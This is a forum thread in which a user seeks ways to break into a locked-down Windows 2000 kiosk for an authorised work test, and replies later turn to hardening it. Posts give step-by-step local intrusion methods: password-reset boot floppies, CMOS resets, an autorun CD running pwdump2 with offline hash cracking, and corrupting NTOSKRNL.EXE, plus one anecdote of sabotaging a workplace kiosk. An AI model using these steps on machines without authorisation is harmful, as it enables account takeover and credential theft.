Work Assignment: "cracking" a secured box.

K

Keetha

Limp Gawd
Joined
Aug 16, 2004
Messages
356
Hello all. My boss has given me the assignment of cracking a box he secured. It is for the visitors in our tour area. He wants me to do something/anything at all, that is not currently "allowed". He has everything disabled except for three things. We can shutdown/standby/restart. When we click on the start button and go to setting, the only thing there is the printers menu. Open that up and we can either access the printer or add a new one. Other than that, when you click on the start button and go to programs, there is internet explorer. That's about all. We're mostly trying to get into the registry and C: drive. Closest I can get is to open IE, go to file, then open, but the c: drive doesn't show up. Thanks for any help.

PS. If you don't believe this is a work assignment but you are sure you have an answer, I can take some pictures. I work at Harley.
 
Try inserting a USB flash drive/CD and seeing if it auto opens, and also try using autoplay to start a program up on the disk to crack passwords.
 
Yes, the autoplay feature works. But what a passowrd cracker be cracking? Only place we have to enter a password is during log on I believe.
 
In ie you could try %windir%\system32\command.com but im just guessing without access to the system. Sounds like fun though.
 
Lord: Access to "blahblahblah" has been disallwoed. thanks though.

puck: On second thought thanks a lot. We're going to try to run sniffers from a disk and see what happens. We never really considered the CD-ROM drive.
 
Same access denied message when we try to run things from disk. This box has no USB so that's not a path :(.
 
While this will win you the assignment it doesn't really prove much.

If you have physical access to the box steal it. Carry it away where you can work on it to your hearts content.

Immutable Law of Security #3
If a bad guy has unrestricted physical access to your computer, its not your computer anymore.

 
how about the offline nt password reset tool, then have local admin rights. BAM.
 
Im assuming that the hd is primary boot and surprised you even had physical access to the cd drive. Anyhow, he most likely went to hd properties->security and denied complete access to the harddrive for a group he created so that would be where to search for a work around. I tried doing this myself and had access to everything in winnt for some reason, which is pleanty to muck things up if thats all some one wanted to do. But ive never had the need to seriously lock down a machine from some one. Im sure you'll get root if you keep at it. (it is windows after all)
 
i don't see anywhere they said it woudln't boot to the cd-rom... even if it didn't... check the bios to see if it has a pw on it... if not change the boot order...

knoppix or bartpe...
 
is there a floppy drive?

who are you protecting this from and what are they using the pc for? is it an AD environment?

what OS? you said something about logging in? is it a local account? If not, have you limited it to only that pc (in network environment)

like the other guy siad, just steal it if its not locked down
 
If you se a BIOS password wont the knoppix approach be exhausted ?

Simple solution that will work IIRC.
 
insert offline nt password reset cd.

reset local admin account.

root.
 
open the case and pull the HD. attach it to another PC.

File this under Rule # 3 =)
 
Party2go9820 said:
Immutable Law of Security #3
If a bad guy has unrestricted physical access to your computer, its not your computer anymore.
Click to expand...

Damn! You beat me to it.

Insert a password recovery CD, reboot, reset the local admin account, login and make changes to your hearts delight.
Click to expand...
 
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.

Lord: I was told all of the lock down was done through the registry actaully.

ghopke: Yes there is a floppy. We're protecting this PC from the people who work in the touring area and possibly some of the tourists themselves. I know we use AD here a lot, but I don't know what this comps involvement with it is. OS = win2k. Actually, I seem to have been wrong about logging in, it just logs in when you turn it on.

I'll look into the password recovery CD thing and knoppix.

Thanks for your input everyone. I just got into work so I have stuff I have to do before I get started on this.
 
if he did it through the registry then you are probably in luck. make a password cracking floppy disk. there should be usable directions here: http://www.petri.co.il/index.htm

then reboot the machine set it to boot from floppy. change the local admin password. log in as local admin (there is very little chance he actually locked this account out with these settings or he'd never be able to make changes). since he is using tweakui or some other program to autologon as some chump user account you will need to hit F8 during boot up and select safe mode. this should prevent tweakui or whatever from running and auto logging in. then log in as local admin. turn off the autologon program. disable all accounts except for local admin, and you're the only one who knows the local admin password at this point. ownage.

OR

boot to the windows recovery console from CD. copy some random file over top of NTOSKRNL.EXE. the system won't even boot to windows any more and you can easily fix it by copying NTOSKRNL.EXE from the install CD back over through the recovery console.

enjoy
 
Interresting ideas floating around in here :)

But once and for all - the BOOT-order is determined by BIOS and mostlikely the HD is set as the first and maybe only boot device.
So until there's access to BIOS settings - all the boot devices in the world won't help you!

Now in order to get access to BIOS without breaking the case open.
1. provided enough time without power the CMOS battery will run dry ;)

2. Most BIOS manufactors include a way to reset CMOS(including password) (On ABiT Boards you just have to hold in insert under BOOT up). Some MB's do it provided 3-5 warm reboots in a row.

3. Some has the ability to alter BOOT device by pressing a key on startup. (F12 usually but not all and sometimes it can be disabled)

Look up the motherboard and check out the manual's BIOS setting.

On a side note I guess your boss did only lock it down to ensure guests can't get "root" and alter/own the machine. So most of the stuff here is probably useless since it must be executed without making to much noise/unfamilar pictures on the screen.

My best bet is like Lord of Shadows said IE, if the machine has internet access maybe you can point it at a site you control that can try and execute stuff... Active X anyone.

-E

 
Keetha said:
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.

Lord: I was told all of the lock down was done through the registry actaully.

ghopke: Yes there is a floppy. We're protecting this PC from the people who work in the touring area and possibly some of the tourists themselves. I know we use AD here a lot, but I don't know what this comps involvement with it is. OS = win2k. Actually, I seem to have been wrong about logging in, it just logs in when you turn it on.

I'll look into the password recovery CD thing and knoppix.

Thanks for your input everyone. I just got into work so I have stuff I have to do before I get started on this.
Click to expand...


hold down the shift key to bypass the auto logon .
 
Thanks a lot guys. I got in. I did the method big daddy reccommended. I booted to a floppy and then changed the password. And thanks for the tip oakfan or I would have had a harder time getting in. Now we are going to change the boot order (it was already at floppy, cd, hdd), put a password on the bios, and maybe physically secure the box. They still need access to the floppy and cd-rom though. I'll keep you updated on what comes up next.
 
shade91 said:
Doesn't sound like the box was too secured.
Click to expand...

With the bios pass and fixed boot order it would be (which I assumed was already done =)), one may also want to disable the default administrator account as well to prevent a blind brute force.
 
Lord of Shadows said:
one may also want to disable the default administrator account as well to prevent a blind brute force.
Click to expand...

On any large network, this is always a good idea. I run a 250 node network, when I add a new system with a fresh imaged disk, I immediately disable the default admin account, and create one that only my staff are aware of. This will block anyone from trying to use the administrator account (which by default has NO password unless specified during OS install)

Good job on figuring it out. but I have a question after the fact...was the right click - properties disabled? this way you could have right clicked taskbar properties, start menu and then re-enabled all of the programs control panel...etc. I did not see this anywhere
 
We put a secure password on the BIOS.
We changed the boot order.
Yes, the right clicking was disabled :).
I'll reccommend changing the name of the admin account, but I don't know what they'll do about that one. It might end up being more trouble than it's worth.
 
No trouble... only takes minutes... you don't want someone to be able to log into the machine itself, rather than onto the network.

QJ
 
umm.. f8 during boot will still give alot of access to the machine... im not very knoledgable about 2k, is there any way to disable this....or password protect it?

i used to pwn one of the kiosks at owrk every so often, the IT guy never figured out how i did it (or that it was me.. :D) ... he always imaged a nt4 drive into the machine.. it would boot correctly every time the first time with every thing instaeed exactly as it should... every so often it would crash out and it would have to be unplugged to reboot... (it ran some sort of flash interface on the screen that couldnt be minimised, and ctrl-alt-del was disabeled.. needless to say there was no way around it to just be able to reboot it.. ) so you plug it back in... during boot it gose to the a black screen and says "hit space bar to load last known good config" so i hit the space bar, and it would revert to a basic install of nt with no drivers (no nic vid was stuck in 16 color touch screen didnt work... ect) he'ed come back out cussing because he had to fix the damn thing again...

thore
 
on the admin account topic- i use a GPO to rename every local admin and local guest account in the domain. takes 5 seconds to do every machine.
 
big daddy fatsacks said:
on the admin account topic- i use a GPO to rename every local admin and local guest account in the domain. takes 5 seconds to do every machine.
Click to expand...

Do tell... :D

QJ
 
Keetha said:
Party2go: Stealing it isn't exactly what they had in mind. I don't think someone would be able to just walk out of the plant with it lolz.
Click to expand...

You want to take bets on that one? Back in the early 90s I worked for The Computer Superstore (you can figure out which national chain that was), we had two computers stolen from the back display area. They unhooked them, picked them up, and walked out with them. No one stopped them. They were gone before anyone realized that anything was wrong.
 
If you can autorun then its simple.

I will assume that you have no write access to any folders on the computer (if you did it would be even easier).

Download pwdump2.exe and burn it onto a cd (or removable disk) with an autorun.inf that runs a batch file. This batch file should run pwdump2 and then pause. Now you need to write down the results from pwdump2 that you see on the screen. You only really need just the line that contains the administrator account.

Now go home and create a text file and type in exactly what you wrote down above. Then download l0phtcrack or john the cracker and run it against the file you made. Let it run until it cracks the password (it could take anywhere from 5 seconds to 5 days).

Tada, you now have the local administrator password.
 
ianshot said:
You want to take bets on that one? Back in the early 90s I worked for The Computer Superstore (you can figure out which national chain that was), we had two computers stolen from the back display area. They unhooked them, picked them up, and walked out with them. No one stopped them. They were gone before anyone realized that anything was wrong.
Click to expand...


Well to get it out they would have to go through a security gate. There is no way they will make it past security with it lolz.

Thanx for the idea korpse, I'll try it on tuesday or wednesday and let you all know how it goes. Too bad we can't disable CD/Floppy (it's needed they say). Any non floppy/CD related ideas now? Kind of hard to come up with them when you can't use the comp, I know.
 
QwertyJuan said:
Do tell... :D

QJ
Click to expand...

I wanted to know too so I googled it:

Host Guest_Blim_MS
Q: njaneardude : do you recommend renaming the local Administrator account? Why or why not?

Host Guest_Blim_MS
A: Renaming the local Administrator account is a good recommendation. It provides further roadblocks for those attempting to gain unauthorized access to your network. Renaming administrator accounts can be done through the following GPO policy: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Rename administrator account.

 
Renaming the administrator account only works if the "hacker" isn't familiar with Windows. There are quick and easy methods to find a renamed admin account as well as I have a boot CD here that will list all users along with their respective level of rights. Once I find the admin account (renamed or not) I can simply reset the password.
 
Well if you could boot the system to a cd you can do whatever you want to the harddrive. I dont see how you could get a list of users with no read/write access to hd with just a mouse and keyboard. (but if you know a way do tell)
 
if you have access to the machine you can do whatever the heck you want to it. there's no doubt about that. but renaming guest and admin will certainly foil a whole hell of a lot of brute force guessing attackes. non?
SJConsultant said:
Renaming the administrator account only works if the "hacker" isn't familiar with Windows. There are quick and easy methods to find a renamed admin account as well as I have a boot CD here that will list all users along with their respective level of rights. Once I find the admin account (renamed or not) I can simply reset the password.
Click to expand...

this CD- are you talking about dumpsec?
 
Lord of Shadows said:
Well if you could boot the system to a cd you can do whatever you want to the harddrive. I dont see how you could get a list of users with no read/write access to hd with just a mouse and keyboard. (but if you know a way do tell)
Click to expand...

See my comments at the end.

big daddy fatsacks said:
if you have access to the machine you can do whatever the heck you want to it. there's no doubt about that. but renaming guest and admin will certainly foil a whole hell of a lot of brute force guessing attackes. non?

I will agree that it will foil the masses who use automated methods without taking into consideration the account may have been renamed.

this CD- are you talking about dumpsec?
Click to expand...

Nope. Bluecon by O&O creates a bootable disc using an existing Windows 2000 or XP along with a few tools. One of the command line tools available is "user", when run, it lists all local accounts and clearly indicates the local administrator account even if it was renamed. The other cmd line tool is "passwd" simply type the command followed by the account name and a new password you want to set (e.g. passwd administrator test).

The only way to prevent the use of the local administrator account is to disable it. However at present I am not aware of any tools or utilities that will reenable the account.

The bootable CD allows full access to any files contained within the hard drive including system files.
 
You must log in or register to reply here.
Back
Top